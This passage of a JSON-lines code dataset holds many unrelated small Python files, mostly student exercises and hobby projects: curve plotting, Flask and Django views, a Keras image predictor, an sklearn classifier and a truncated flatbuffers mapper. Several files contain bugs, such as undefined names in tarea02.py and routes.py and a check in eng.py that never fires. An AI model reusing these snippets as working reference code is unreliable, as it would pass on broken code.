specialty_urls_list[specialty_number - 1][3:]))\r\n\r\nplace = []\r\nprint('Подождите, происходит магия...')\r\n\r\nfor i in reception_tables_url:\r\n place.append(place_in_the_list(i, name, amount_of_bills))\r\n\r\nprint('Список поступающих:', place[0])\r\nprint('Список поступающих с оригиналами:', place[1])\r\nprint('Список поступающих, давших согласие:', place[2])\r\n\r\nprint(input())\r\n","sub_path":"check-place-in-the-list.py","file_name":"check-place-in-the-list.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"306172347","text":"import tkinter as tk\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\n# Implement the default Matplotlib key bindings.\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# Hélice Conica\n\n# Hélice Circular\n\n# Corona Sinusoidal\n\n# Curva de Viviani\n\n# Hipopoda\n\n# Espiral Cónica de Papus\n\n# Curva de Arquitas\n\n# Horóptera\n\n# Curva Bicilindrica\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\nimport matplotlib.pyplot as plt\n\n#Se crea funcion\n\ndef bicilindrica():\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ab = fig.gca(projection='3d')\n\n a = 5\n c = 1\n b = 1\n theta = np.linspace(-4 * np.pi, 4* np.pi, 100)\n\n#Se da valor a las variables\n\n x1 = a*np.cos(theta)**2\n y1 = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n z1 = - c+a*np.sin(theta)\n z = c+a*np.sin(theta)\n x = a*np.cos(theta)**2\n y = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n N = 1000\n t= 10\n\n#Se aplica formula parametrica\n\n def gen(N):\n for theta in np.linspace(-4 * np.pi, 4 * np.pi, 
100):\n x = a*np.cos(theta)\n y = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n z = c+a*np.sin(theta)\n yield np.array([x, y, z])\n\n\n def update(num, data, line):\n line.set_data(data[:2, :num])\n line.set_3d_properties(data[2, :num])\n\n\n def gen1(N):\n for theta in np.linspace(-4 * np.pi, 4 * np.pi, 100):\n x1 = a*np.cos(theta)\n y1 = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n z1 = - (c+a*np.sin(theta))\n yield np.array([x1, y1, z1])\n\n\n def update1(num1, data1, line1):\n line1.set_data1(data1[:2, :num1])\n line1.set_3d_properties(data1[2, :num1])\n\n\n data = np.array(list(gen(N))).T\n data1 = np.array(list(gen1(N))).T\n line, = ax.plot(data[0, 0:1], data[1, 0:1], data[2, 0:1])\n line1, = ab.plot(data1[0, 0:1], data1[-1, 0:1], data1[-2, 0:1])\n\n# Configuracion de ejes\n ax.set_xlim3d([-20.0, 20.0])\n ax.set_xlabel('X')\n\n ab.set_xlim3d([20.0, -20.0])\n ab.set_xlabel('Eje X')\n\n ax.set_ylim3d([-20.0, 20.0])\n ax.set_ylabel('Y')\n\n ab.set_ylim3d([20.0, -20.0])\n ab.set_ylabel('Eje Y')\n\n ax.set_zlim3d([-20.0, 10.0])\n ax.set_zlabel('Z')\n\n ab.set_zlim3d([20.0, -10.0])\n ab.set_zlabel('Eje Z')\n\n ani = animation.FuncAnimation(fig, update, N, fargs=(data, line), interval=10000 / N, blit=False)\n\n ani1 = animation.FuncAnimation(fig, update1, N, fargs=(data1, line1), interval=10000 / N, blit=False)\n\n\n plt.show()\n\nif __name__ == '__main__':\n # Creación de Ventanas\n root = tk.Tk()\n root.wm_title(\"Tarea 02 (15%)\")\n root.geometry(\"800x600\")\n\n # Crear frame contenedor de los elementos\n frame = tk.Frame(root)\n frame.pack(padx=20, pady=20)\n # Añadir titulo\n label = tk.Label(frame, text=\"Curvas Paramétricas Famosas\", height=\"2\")\n label.pack(fill=tk.X, expand=1)\n imagen = tk.PhotoImage(file=\"image.jpg\")\n boton = tk.button(master=frame, text=\"Curva Bicilindrica\", command=Bicilindrica, image=imagen)\n boton.pack(side=tk.BOTTOM, padx=10, pady=10)\n\n tk.mainloop()\n","sub_path":"interface/tarea02.py","file_name":"tarea02.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"401565842","text":"from app import app\nfrom flask import render_template, flash, redirect,url_for\nfrom app.app_login_form import LoginForm\nfrom flask_login import current_user, login_user\nfrom app.models import User\nfrom flask_login import logout_user\nfrom flask import request\nfrom werkzeug.urls import url_parse\n@app.route('/')\n@app.route('/index')\n@login_required\ndef index():\n return \"MY first flask script says hello world\"\n\n@app.route('/p1')\n\ndef p1():\n user = {'username': 'brother'}\n messages=[\n {\n 'sender':'human1',\n 'message':'iam a human'\n\n\n },{\n 'sender':'robot',\n 'message':'iam a robot'\n\n\n }]\n \n return render_template('firstPage.html',title=\"first page\", user=current_user,messages = messages)\n@app.route('/login',methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('p1'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return 
redirect(url_for('index'))","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14039767","text":"import json\nfrom time import sleep\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\nfrom home.models import Questions\nfrom home.utils import define_expression, set_up_expression\n\n\nclass HomeView(View):\n\n def get(self, request):\n return render(request, 'home.html')\n\n def post(self, request):\n\n data = {\n 'systolic_bp': int(request.POST.get('sys_bp', '0')),\n 'diastolic_bp': int(request.POST.get('dias_bp', '0')),\n 'gender': request.POST.get('sex', ''),\n 'age': int(request.POST.get('age', '0')),\n 'abdominal_pain': True if request.POST.get('abd_pain', '') == 'on' else False\n }\n missed_params = define_expression(data)\n data['response'] = []\n rules_query = Questions.objects.all()\n for missed_param in missed_params:\n rules_query = rules_query.exclude(expression__icontains=missed_param)\n rules = rules_query.all()\n for rule in rules:\n if set_up_expression(parameters=data, expression_dict=rule.rule):\n data['response'].append({'question': rule.ask_question})\n sleep(1)\n return HttpResponse(json.dumps(data))\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118578151","text":"import matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 设置图例字号\nmpl.rcParams['legend.fontsize'] = 10\nfig = plt.figure()\n\n# 设置三维图形模式\nax = fig.gca(projection='3d')\nax.legend()\n# 测试数据\n\ndef drawStatic(line):\n theta = np.ones(100)\n z = np.linspace(0, 8, 100) / 4\n for L in line:\n x = L[0]*theta\n y = L[1]*theta\n ax.plot(x, y, z, color='orange')\ndef drawCurve():\n z = np.linspace(0, 6, 100) / 4\n y = np.linspace(-2, 3, 100)\n x = -1.5*np.cos((y+2)*0.2*np.pi)+1.5\n ax.plot(x,y,z,color='red')\n# 显示图例\ndef drawDy1():\n y = np.linspace(1, -2, 100)\n x = -2/3*y+2/3\n z = np.zeros(100)\n for i in range(1,100):\n z[i] = 0.0002*i*i+0.01\n ax.plot(x, y, z, color='blue')\ndef drawDy2():\n x = np.linspace(1, 3, 100)\n y = -2*x+5\n z = np.zeros(100)\n for i in range(1,100):\n z[i] = 0.15*np.sqrt(i)\n ax.plot(x, y, z, color='blue')\n# 显示图形\n\nif __name__=='__main__':\n staticObstacle = [[2.2, 2]]\n drawStatic(staticObstacle)\n drawCurve()\n drawDy1()\n drawDy2()\n drawStatic([[0.5, -1.2]])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('t')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_zticks([])\n plt.show()","sub_path":"figCreate.py","file_name":"figCreate.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"573923653","text":"\n\"\"\"\nHabitica API\n\"\"\"\n\n\nAUTH_HEADER_CLIENT = 'x-api-user'\nAUTH_HEADER_TOKEN = 'x-api-key'\n\nAPI_BASE_URL = 'https://habitica.com/api/v2'\n\n\nGET_STATUS = API_BASE_URL + '/status'\n\nGET_USER = API_BASE_URL + '/user'\nGET_USER_ANONYMIZED = API_BASE_URL + '/user/anonymized'\n\nPOST_TASK = API_BASE_URL + '/user/tasks/{id}/{direction}'\n\nJSON_STATUS = 'status'\nJSON_UP = 'up'\nJSON_DOWN = 'down'\nJSON_ID = 'id'\nJSON_DELTA = 'delta'\nJSON_BUFFS = 'buffs'\n\nJSON_AUTH = 'auth'\nJSON_LOCAL = 'local'\nJSON_FACEBOOK = 'facebook'\nJSON_FORMAT_JSON 
= '_json'\nJSON_USERNAME = 'username'\nJSON_EMAIL = 'email'\nJSON_NAME = 'name'\n","sub_path":"wh_habitica/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"60131573","text":"n = 3\nwords =\t[\"tank\", \"kick\", \"know\", \"wheel\", \"land\", \"dream\", \"mother\", \"robot\", \"tank\"]\nanswer = []\nwordsCopy = []\nwordsCopy.append(words[0])\ncheckWord = words[0]\nfor i in range(1, len(words)):\n if(checkWord[-1] != words[i][0]) or words[i] in wordsCopy:\n answer.append(i%n+1)\n answer.append(i//n+1)\n print(answer)\n wordsCopy.append(words[i])\n checkWord = words[i]\nif answer is None:\n answer.append(0)\n answer.append(0)\n print(answer)\n","sub_path":"eng.py","file_name":"eng.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624491367","text":"import numpy as np\nfrom sklearn import tree\n\nTRAIN_FILE_NAME = '1505760800_9146957_train_drugs.data'\nTEST_FILE_NAME = '1505760800_9191542_test.data'\nRESULT_FILE_NAME = 'resultpython.txt'\n\n\ndef arrToVect(arr):\n vector = [0] * 100000\n for i in arr:\n vector[int(i) - 1] = 1\n return vector\n\n\ndef createModel(filename):\n X = []\n Y = []\n print(\"Reading Training\")\n with open(filename, 'r') as f:\n data = f.readlines()\n for line in data:\n arr = line.split()\n Y.append(int(arr[0]))\n # X.append(arr)\n X.append(arrToVect(arr[1:]))\n print(\"Building Tree\")\n clf = tree.DecisionTreeClassifier()\n clf = clf.fit(X, Y)\n print(\"Tree Successful\\n\")\n return clf\n\n\ndef testSet(filename):\n print(\"Reading Test Data\\n\")\n tSet = []\n with open(filename, 'r') as f:\n data = f.readlines()\n for line in data:\n arr = line.split()\n tSet.append(arrToVect(arr))\n # tSet = np.array(tSet)\n return tSet\n\n\ndef listToFile(itemList, filename):\n with open(filename, 'w') as f:\n for item in itemList:\n f.write(str(item) + '\\n')\n return\n\n\nclfPredictor = createModel(TRAIN_FILE_NAME)\nanswer = []\ntestSetList = testSet(TEST_FILE_NAME)\noutput = clfPredictor.predict(testSetList)\n\nlistToFile(output, RESULT_FILE_NAME)\n","sub_path":"oldFiles/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157246677","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport os\nimport compactobjects as cobj\nfrom compactobjects import conversion_dict\n\n# useful constants \n\nfrom scipy.constants import speed_of_light, gravitational_constant, pi, hbar, h, m_n, m_e\nimport astropy.constants as const\n\nsolar_mass = const.M_sun.value # kg\n\nC_SI = speed_of_light # m s^-1\nC_CGS = C_SI*100 # cm s^-1\nG_SI = gravitational_constant # m^3 kg^-1 s^-2\nG_CGS = G_SI*1000 # cm^3 g^-1 s^-2\nMSUN_SI = solar_mass # kg\nMSUN_CGS = solar_mass*1000 # g\nHBAR_SI = hbar # J s\nHBAR_CGS = HBAR_SI*1e7 # ergs s\n\n# create the folder where save the results\n\nscript_dir = os.path.dirname(__file__)\nresults_dir = os.path.join(script_dir, 'WDOutput/')\nif not os.path.isdir(results_dir):\n os.makedirs(results_dir)\n\n#####################################\n# MAIN FOR THE POLYTROPIC CASES #\n#####################################\n\n# MAIN FOR THE RELATIVISTIC POLYTROPIC CASE\n\n# Build only a star with a tabulated value of central pressure\n\ngamma = 4/3\ne0 = 7.463e39 * conversion_dict['cgs']['pressure']['geom'] \nk = 
1/(e0**(gamma -1))\np0 = e0*1e-14\n\neos = cobj.PressureEdenPolytropic(k, gamma)\n\nwd = cobj.CompactStar(eos)\nwd.set_radii_range(np.linspace(1e-3, 5e7, int(1e6)))\n\nr_newton , m_newton, p_newton = wd.structure_solver('Newton', p0)\nR_newton = r_newton[-1]\nM_newton = m_newton[-1]\n\nr_tov , m_tov, p_tov = wd.structure_solver('TOV', p0)\nR_tov = r_tov[-1]\nM_tov = m_tov[-1]\n\nprint('=========================================================')\nprint('Fermi White Dwarf in the relativistic polytropic case.')\nprint('Central pressure : ', p0*conversion_dict['geom']['pressure']['cgs'], \" dyne/cm^2\")\nprint('---------------------------------------------------------')\nprint(' M_newton = ', M_newton, ' R_newton = ', R_newton,\n '\\n', ' M_tov = ', M_tov, ' R_tov = ', R_tov)\nprint('=========================================================')\n\n# create a figure of m(r) and P(r)\n\nfig,ax = plt.subplots()\nplt.text(0.5, 1.07, \"P(r) & m(r) of a relativistic Fermi gas white dwarf\",\n horizontalalignment='center',\n fontsize=12,\n transform = ax.transAxes)\nax.plot(r_newton, p_newton, color=\"blue\", linestyle=\"-\", linewidth=1, label = 'P Newton')\nax.plot(r_tov, p_tov, color=\"black\", linestyle=\"-\", linewidth=2, label = 'P TOV')\nax.set_xlabel('r [km]',fontsize=14)\nax.set_ylabel(r'P [$dyne/cm^2$]', fontsize=14)\nax.minorticks_on()\n\nax2 = ax.twinx()\nax2.plot(r_newton, m_newton,color=\"blue\", linestyle=\":\", label = 'm Newton')\nax2.plot(r_tov, m_tov, color=\"black\", linestyle=\"-.\", label = 'm TOV')\nax2.plot(R_newton, M_newton, marker = 'o', color='green', label='WD Newton mass')\nax2.plot(R_tov, M_tov, marker = 'o', color='red', label='WD TOV mass')\nax2.set_ylabel(r\"m [$M_{\\odot}$]\",fontsize=14)\nax2.minorticks_on()\n\nfig.legend(loc=\"upper center\", bbox_to_anchor=(0.5,1), bbox_transform=ax.transAxes)\nplt.rcParams[\"savefig.bbox\"] = \"tight\"\nfig.savefig(results_dir+'relwd_mp-vs-r.pdf',\n format='pdf',\n dpi=1000)\n\n# Build a sequence of 500 stars. 
\n\np0_min = 1e24*conversion_dict['cgs']['pressure']['geom']\np0_max = 2.5e26*conversion_dict['cgs']['pressure']['geom']\npressures = np.linspace(p0_min, p0_max, 500)\n\nR_star_tov, M_star_tov = wd.mass_vs_radius('TOV', pressures)\nR_star_newton, M_star_newton = wd.mass_vs_radius('Newton', pressures)\n\n# plot Mass-Radius\n\nfig,ax = plt.subplots()\nplt.title(\"TOV Mass-Radius of a relativistic Fermi gas WD\")\nax.plot(R_star_tov, M_star_tov, color=\"black\", linestyle=\"-.\", linewidth=2, label = 'TOV')\nax.set_xlabel('R [km]',fontsize=14)\nax.set_ylabel(r\"M [$M_{\\odot}$]\", fontsize=14)\nax.minorticks_on()\n\nfig.legend(loc='upper right')\nplt.rcParams[\"savefig.bbox\"] = \"tight\"\nfig.savefig(results_dir+'relwd_mass-vs-radius.pdf',\n format='pdf',\n dpi=1000)\n\n# plot Mass/Radius - central pressure\n\nfig,ax = plt.subplots()\nplt.title(\"Mass/Radius vs Central Pressure in a relativistic Fermi gas white dwarf\")\nax.set_xscale('log')\nax.minorticks_on()\nax.plot(pressures*conversion_dict['geom']['pressure']['cgs'], M_star_newton, color=\"blue\", linestyle=\"-.\", linewidth=1, label = 'M-Newton')\nax.plot(pressures*conversion_dict['geom']['pressure']['cgs'], M_star_tov, color=\"black\", linestyle=\"-.\", linewidth=2, label = 'M-TOV')\nax.set_xlabel('p0 [$dyne/cm^2$]',fontsize=14)\nax.set_ylabel(r\"M [$M_{\\odot}$]\", fontsize=14)\n\nax2 = ax.twinx()\nax2.set_xscale('log')\nax2.minorticks_on()\nax2.plot(pressures*conversion_dict['geom']['pressure']['cgs'], R_star_newton, color=\"blue\", linestyle=\":\", linewidth=1, label = 'R-Newton')\nax2.plot(pressures*conversion_dict['geom']['pressure']['cgs'], R_star_tov, color=\"black\", linestyle=\":\", linewidth=2, label = 'R-TOV')\nax2.set_ylabel(r\"R [$km$]\",fontsize=14)\n\nfig.legend(loc='center right', bbox_to_anchor=(1,0.5), bbox_transform=ax.transAxes)\nplt.rcParams[\"savefig.bbox\"] = \"tight\"\nfig.savefig(results_dir+'relwd_mr-vs-p0.pdf',\n format='pdf',\n dpi=1000)","sub_path":"tests/FermiGasWD/rel_wd.py","file_name":"rel_wd.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"22259924","text":"#!/usr/bin/python3.6\r\n\r\n\"\"\"\r\nWe will create the most basic form of a nueraon in raw non abstract method\r\nUsing 3 inputs\r\n\"\"\"\r\n\r\n\"\"\"\r\nThese are the value of inputs which are fed to the nueron\r\nAn input can come as an op from another layer or the first layer\r\n\"\"\"\r\ninputs = [1.2, 5.1, 2.1]\r\n\r\n\"\"\"\r\n Every input has a unique weight associated with it. We cannot \r\n tweak the input value but we can change the weights\r\n\"\"\"\r\nweights = [3.1, 2.1, 8.7]\r\n\r\n\"\"\"\r\nBias is just like an intercept added in a linear equation. \r\nIt is an additional parameter in the Neural Network which is used \r\nto adjust the output along with the weighted sum of the inputs to the neuron\r\n\"\"\"\r\nbias = 3.0\r\n\r\n\"\"\"\r\nOutput formula from a single nueron is\r\nop = sum(weights * inputs) + bias\r\ni;e sum(w1*i1 + w2*i2 + w3*i3 .... 
wn*in) + bias \r\nThis is also called activation function\r\n\"\"\"\r\n\r\noutput = inputs[0]*weights[0] + inputs[1]*weights[1] + inputs[2]*weights[2] + bias\r\nprint(output)\r\n","sub_path":"nnfs/1_codingANueron.py","file_name":"1_codingANueron.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"21072248","text":"#!/usr/bin/env python3\n\nimport os\nimport struct\nimport numpy as np\nimport argparse\n\n\n\ndef load_ndfile(filename):\n with open(filename, 'rb') as f:\n dtype = struct.unpack('8s', f.read(8))[0].decode('utf-8').strip('\\x00')\n rank = struct.unpack('i', f.read(4))[0]\n dims = struct.unpack('i' * rank, f.read(4 * rank))\n data = f.read()\n return np.frombuffer(data, dtype=dtype).reshape(dims)\n\n\n\ndef load_checkpoint(btdir):\n database = dict()\n\n for patch in os.listdir(btdir):\n\n fd = os.path.join(btdir, patch)\n pd = dict()\n\n for field in os.listdir(fd):\n fe = os.path.join(fd, field)\n pd[field] = load_ndfile(fe)\n\n database[patch] = pd\n\n return database\n\n\n\ndef imshow_database(database):\n import matplotlib.pyplot as plt\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 1, 1)\n div1 = make_axes_locatable(ax1)\n cax1 = div1.append_axes('right', size='5%', pad=0.05)\n\n for key, patch in database.items():\n\n R = patch['vert_coords'][:,:,0]\n Q = patch['vert_coords'][:,:,1]\n D = patch['primitive'][:,:,0]\n V = patch['primitive'][:,:,1]\n X = R * np.cos(Q)\n Y = R * np.sin(Q)\n\n im1 = ax1.pcolormesh(Y, X, D, edgecolor='none', lw=0.5)\n fig.colorbar(im1, cax=cax1, orientation='vertical')\n\n ax1.set_title('Log density')\n ax1.set_aspect('equal')\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filenames\", nargs='+')\n args = parser.parse_args()\n\n db = load_checkpoint(args.filenames[0])\n imshow_database(db)\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"187965031","text":"from keras.models import model_from_json\nfrom pathlib import Path\nfrom keras.preprocessing import image\nimport numpy as np\nfrom keras.applications import vgg16\n\n# Load the json file that contains the model's structure\nscript_location = Path(__file__).absolute().parent\nmodel_structure_file = script_location/ \"model_structure.json\"\nmodel_structure = model_structure_file.read_text()\n\n# Recreate the Keras model object from the json data\nmodel = model_from_json(model_structure)\n\n# Re-load the model's trained weights\nmodel.load_weights(\"model_weights.h5\")\n\n# Load an image file to test, resizing it to 64x64 pixels (as required by this model)\nimg_file= script_location/\"dog.png\"\nimg = image.load_img(img_file, target_size=(64, 64))\n\n# Convert the image to a numpy array\nimage_array = image.img_to_array(img)\n\n# Add a forth dimension to the image (since Keras expects a bunch of images, not a single image)\nimages = np.expand_dims(image_array, axis=0)\n\n# Normalize the data\nimages = vgg16.preprocess_input(images)\n\n# Use the pre-trained neural network to extract features from our test image (the same way we did to train the model)\nfeature_extraction_model = vgg16.VGG16(weights='imagenet', include_top=False, input_shape=(64, 64, 3))\nfeatures = feature_extraction_model.predict(images)\n\n# Given the extracted 
features, make a final prediction using our own model\nresults = model.predict(features)\n\n# Since we are only testing one image with possible class, we only need to check the first result's first element\nsingle_result = results[0][0]\n\n# Print the result\nprint(\"Likelihood that this image contains a dog: {}%\".format(int(single_result * 100)))\n\n###Print image\nimport matplotlib.pyplot as plt\nsample_image = image.load_img(img_file, target_size=(64, 64))\n# Draw the image as a plot\nplt.imshow(sample_image)\n# Show the plot on the screen\nplt.show()","sub_path":"MakingPredictions_TransferLearning_deepLearning.py","file_name":"MakingPredictions_TransferLearning_deepLearning.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"239631110","text":"from flask_restful import Resource, reqparse\n\nfrom model import Category\nfrom util.rest_resp import Resp\nfrom . import api, db, abort_if_obj_null\n\n\n@api.resource(\"/category/\")\nclass CategoryResource(Resource):\n\n def get(self,cid):\n\n entity = Category.query.get(cid)\n\n abort_if_obj_null(entity)\n\n return Resp(data=entity.to_json())\n\n\n def delete(self,cid):\n\n entity = Category.query.get(cid)\n abort_if_obj_null(entity)\n\n try:\n db.session.delete(entity)\n db.session.commit()\n\n return Resp()\n except Exception as ex:\n db.session.rollback()\n\n return Resp(code=400,msg='delete error')\n\n def put(self,cid):\n pass\n\n\ncreate_parse = reqparse.RequestParser()\ncreate_parse.add_argument('name',required=True)\ncreate_parse.add_argument('description',default='')\n\n\n@api.resource(\"/category\")\nclass CategoryListResource(Resource):\n\n def get(self):\n\n entices = Category.query.all()\n data = [e.to_json() for e in entices]\n return Resp(data=data)\n\n def post(self):\n args = create_parse.parse_args()\n\n entity = Category(name=args.get('name'),description=args.get('description'))\n\n try:\n db.session.add(entity)\n db.session.commit()\n return Resp(data=entity.to_json())\n except Exception as ex:\n db.session.rollback()\n\n return Resp(code=400,msg='insert failure')","sub_path":"api/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"226222231","text":"\"\"\"TC ETDMS Validator\nsuper duper ultra basic web page for internal use by non dev\n\"\"\"\nfrom bottle import get, post, request, run\nfrom validate import *\nimport sys, io\n\n@get('/')\ndef home():\n \"\"\"barebone form to ask user for information\"\"\"\n return '''\n
<form action=\"/\" method=\"post\">\n OAI url: <input name=\"url\" type=\"text\" /> *required<br/>
\n Metadata format: <input name=\"metadataformat\" type=\"text\" /><br/>
\n Set: <input name=\"dataset\" type=\"text\" /><br/>
\n <input value=\"Validate\" type=\"submit\" />\n </form>
\n '''\n\n\n@post('/')\ndef validate_feed():\n \"\"\"run cli script and print output\"\"\"\n url = request.forms.get('url')\n metadata_format = request.forms.get('metadataformat')\n dataset = request.forms.get('dataset')\n # Hacking stdout, this is how you use a non-library as a library\n # when in a rush\n stdout = sys.stdout\n sys.stdout = io.StringIO()\n\n if (check_url(url)\n and check_identify(url)\n and check_metadata_formats(url, metadata_format)\n and check_these(url, metadata_format, dataset)):\n print(\"Validation completed successfuly, metadata can be harvested\")\n\n output = sys.stdout.getvalue()\n sys.stdout = stdout\n return output.replace('<', '[').replace('>', ']').replace('\\n', '
')\n\n\nrun(host='localhost', port=8080, debug=True, server='gunicorn')","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"274399800","text":"\"\"\"\n 练习2:定义函数,判断二维列表是否存在某个数字\n 输入:二维列表,2\n 输出:TRUE\n\"\"\"\nmap = [ [2, 2, 0, 4],\n [0, 4, 8, 8 ],\n [2, 2, 2, 2 ],\n [0, 2, 2, 0]]\ndef judge_exist(list,number):\n for i in list:\n if number in i:\n return \"true\"\n return \"false\"\nprint(judge_exist(map,5))\n","sub_path":"month01/day09/day08/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"257844564","text":"from dataclasses import dataclass\nfrom enum import Enum\nfrom typing import List, Any\n\nfrom flatbuffers import Builder\nfrom keios_protocol_spacy.flatbuffers import DEPSpacyResponse as DEPSpacyResponseClass\nfrom keios_protocol_spacy.flatbuffers import NERSpacyResponse as NERSpacyResponseClass\nfrom keios_protocol_spacy.flatbuffers import SpacyBatchRequest as SpacyBatchRequestClass\nfrom keios_protocol_spacy.flatbuffers import SpacyBatchResponse as SpacyBatchResponseClass\nfrom keios_protocol_spacy.flatbuffers import SpacyMessage as SpacyMessageClass\nfrom keios_protocol_spacy.flatbuffers import SpacyMessageType\nfrom keios_protocol_spacy.flatbuffers import SpacyRequest as SpacyRequestClass\nfrom keios_protocol_spacy.flatbuffers import SpacyResponse as SpacyResponseClass\nfrom keios_protocol_spacy.flatbuffers.SpacyBatchRequest import SpacyBatchRequest, SpacyBatchRequestStartRequestsVector, \\\n SpacyBatchRequestAddRequests, SpacyBatchRequestEnd\nfrom keios_protocol_spacy.flatbuffers.SpacyBatchResponse import SpacyBatchResponse\nfrom keios_protocol_spacy.flatbuffers.SpacyRequest import SpacyRequest, SpacyRequestStartTypeVector, \\\n SpacyRequestAddType, SpacyRequestEnd, SpacyRequestStart\nfrom keios_protocol_spacy.flatbuffers.SpacyResponse import SpacyResponse, SpacyResponseStartDepVector, \\\n SpacyResponseAddDep, SpacyResponseEnd, SpacyResponseStart, SpacyResponseStartNerVector, SpacyResponseAddNer\nfrom keios_protocol_spacy.flatbuffers.Type import Type\n\n\n@dataclass\nclass SpacyMessageData:\n type: SpacyMessageType\n message: object\n\n\nclass SpacyMessageMapper:\n @staticmethod\n def serialize(entity: SpacyMessageData) -> bytearray:\n builder = Builder(128)\n\n payload_offset = None\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyResponse:\n payload_offset = SpacyResponseMapper.serialize(entity.message, builder)\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyRequest:\n payload_offset = SpacyRequestMapper.serialize(entity.message, builder)\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyBatchRequest:\n payload_offset = SpacyBatchRequestMapper.serialize(entity.message, builder)\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyBatchResponse:\n payload_offset = SpacyBatchResponseMapper.serialize(entity.message, builder)\n\n SpacyMessageClass.SpacyMessageStart(builder)\n SpacyMessageClass.SpacyMessageAddMessageType(builder, entity.type)\n SpacyMessageClass.SpacyMessageAddMessage(builder, payload_offset)\n message_offset = SpacyMessageClass.SpacyMessageEnd(builder)\n builder.Finish(message_offset)\n\n return builder.Output()\n\n @staticmethod\n def deserialize(bb: bytearray) -> SpacyMessageData:\n message = 
SpacyMessageClass.SpacyMessage.GetRootAsSpacyMessage(bb, 0)\n wrapped = message.Message()\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyResponse:\n fb_obj = SpacyResponse()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyResponseMapper.to_dataclass(fb_obj))\n\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyRequest:\n fb_obj = SpacyRequest()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyRequestMapper.to_dataclass(fb_obj))\n\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyBatchRequest:\n fb_obj = SpacyBatchRequest()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyBatchRequestMapper.to_dataclass(fb_obj))\n\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyBatchResponse:\n fb_obj = SpacyBatchResponse()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), 